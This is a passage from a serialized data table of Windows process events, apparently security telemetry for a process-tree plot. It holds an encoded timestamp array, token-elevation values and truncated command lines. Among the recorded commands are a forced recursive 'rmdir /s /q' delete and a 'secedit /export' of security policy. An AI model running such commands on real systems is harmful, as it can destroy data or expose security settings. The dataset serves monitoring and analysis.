yNdkIA8Pi3bI12QgDw+LdsjXZCAPD4t2yNdkIA8Pi3bI12QgDw+LdsjXZCAPD4t2yNdkL8z6jcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgBw3NxsjXZCAHDc3GyNdkIAcNzcbI12QgDw+LdsjXZCAPD4t2yNdkIA8Pi3bI12QgDw+LdsjXZCAPD4t2yNdkIA8Pi3bI12QgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPxPsAR3jXZC/E+wBHeNdkL8T7AEd412QvxPsAR3jXZC/E+wBHeNdkL8T7AEd412QvxPsAR3jXZC/E+wBHeNdkL8T7AEd412QvxPVRB3jXZC/A+GEHeNdkL8D4YQd412QvwPhhB3jXZC/A+GEHeNdkL8D4YQd412QgBwlBB3jXZC/A+GEHeNdkL8D4YQd412QvwPhhB3jXZC/A+GEHeNdkL8D4YQd412QvwPhhB3jXZC/A+GEHeNdkL8D4YQd412QgCAqRB3jXZC/A+GEHeNdkL8D4YQd412QvwPhhB3jXZC/E+wBHeNdkL8T7AEd412QvxPsAR3jXZC/E+wBHeNdkL8T7AEd412QvxPsAR3jXZC/E+wBHeNdkL8T7AEd412QvxPsAR3jXZC/E+wBHeNdkL8T7AEd412QvxPsAR3jXZC/E+wBHeNdkL8T7AEd412QvxPsAR3jXZC/E+wBHeNdkIAQHI3d412QvwPpDd3jXZC/A+kN3eNdkL8D6Q3d412QvwPpDd3jXZC/A+kN3eNdkL8D6Q3d412QvwPpDd3jXZC/A+kN3eNdkL8D6Q3d412QvwPpDd3jXZC/A+kN3eNdkL8D6Q3d412QvwPpDd3jXZC/A+kN3eNdkL8D6Q3d412QvwPpDd3jXZC/A+kN3eNdkL8D6Q3d412Qv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\",\"dtype\":\"float64\",\"shape\":[1010]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"cmd\":[\"cmdline unknown\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\"C:\\\\Windows\\\\system32\\\\unlodctr.exe\\\" \\\"cps etw data s...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\c...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cv...\",\"\\\"C:\\\\Windows\\\\system32\\\\lodctr.exe\\\" \\\"C:\\\\Windows\\\\TEMP\\\\...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c rmdir /s /q C:\\\\Prog...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c WerFault.exe -k -q\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"WerFault.exe -k -q\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeE...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeE...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /cfg \\\"C:\\\\P...\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /mergedpol...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring 